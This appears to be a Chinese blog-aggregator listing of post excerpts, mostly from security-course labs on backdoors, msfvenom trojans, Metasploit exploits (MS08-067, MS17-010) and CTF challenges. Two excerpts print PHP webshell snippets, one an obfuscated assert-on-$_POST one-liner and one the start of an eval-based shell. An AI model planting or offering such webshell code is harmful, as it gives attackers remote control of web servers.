关于制作有后门的程序 靶机:win7 192.168.147.149 攻击机:kali 192.168.147.133 第一次尝试 启动msf,使用msfvenom制作木马 详解: 通过一些方法将生成的木马文件上传到靶机(这里使用网盘) 之后启动handler进行监听,在win7上运行木马,没有反应 ...
分类:
Web程序 时间:
2020-06-15 22:33:10
阅读次数:
66
2019-2020-2 网络对抗技术 20174326旦增列错 Exp2 后门原理与实践 目录 一、实验介绍 二、实验准备 三、实验过程 任务一:使用netcat实现windows,linux之间的后门连接 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:MFS meterpr ...
分类:
其他好文 时间:
2020-05-26 12:24:00
阅读次数:
74
xman_2019_format(非栈上格式化字符串仅一次利用的爆破) 首先检查一下程序的保护机制 然后用IDA分析一下 存在后门 首先malloc了一片堆空间,读入数据 把刚刚读入的数据当作格式化字符串传递给printf 这题就是考察格式话字符串不在栈上怎么利用,我们的想法就是利用栈上的数据。 首 ...
分类:
其他好文 时间:
2020-05-20 14:10:12
阅读次数:
106
<?php $p=base64_decode("bW93YW5n");$i['j']='assert';$a[]=$i;@$a[0]['j']($_POST[$p]);$filename = $php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER ...
分类:
其他好文 时间:
2020-05-15 13:29:09
阅读次数:
159
evalPHP一句话后门 <?php $password='c2.o'; $shellname='BY:FBI'; $myurl='http://www.baidu.com'; error_reporting(E_ERROR | E_PARSE);@set_time_limit(0); ob_sta ...
分类:
Web程序 时间:
2020-05-15 13:23:16
阅读次数:
242
Java 程序语言的后门-反射机制 //通知dousil做事 method.invoke(object,args); //通过反射,将h作为参数,实例化代理类,返回代理实例 return cons.newInstance(new Object[]{h}) //将接口数组赋值一份 final Clas ...
分类:
编程语言 时间:
2020-05-09 18:57:49
阅读次数:
66
题目描述 其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 题目截图 解题思路 查看源代码发现一个url链接 尝试访问这个url 将参数更换为:/etc/passwd 发现存在文件读取漏洞 尝试读取index.php 回显ok 利用file协议读取/var/www/html/index.ph ...
分类:
Web程序 时间:
2020-05-08 23:03:26
阅读次数:
153
1.开源软件的特点就是把软件程序与源代码文件一起打包提供给用户,让用户在不受限制地使用某个软件功能的基础上还可以按需进行修改,或编制成衍生产品再发布出去。用户具有使用自由、修改自由、重新发布自由以及创建衍生品的自由。 2.开源软件最重要的特性有: 1)低风险:使用闭源软件无疑把命运交付给他人,一旦封 ...
分类:
系统相关 时间:
2020-05-02 17:19:08
阅读次数:
76
[toc] 1. cors 介绍 cors 说的是一个机制,其实相当于一个http协议的约定,就是用一段http头部字段来开一扇后门; 当跨域发生时,服务器本身收不到浏览器发的请求(因为被拦截了),现在服务器说我给你一扇门,但是你要符合一定的条件,只要符合条件就能通信。 2. 原理 当后端服务器引入 ...
分类:
其他好文 时间:
2020-04-27 10:05:51
阅读次数:
71
目录 + 基础知识 + 实验目标 + 实验内容 + 主动攻击的实践 + "ms08_067_netapi——成功" + "ms17_010_eternalblue——成功" + 攻击浏览器的实践 + "ms17_010_eternalblue——成功" + "ms14_064——成功" + 攻击客户 ...
分类:
其他好文 时间:
2020-04-26 15:24:00
阅读次数:
96
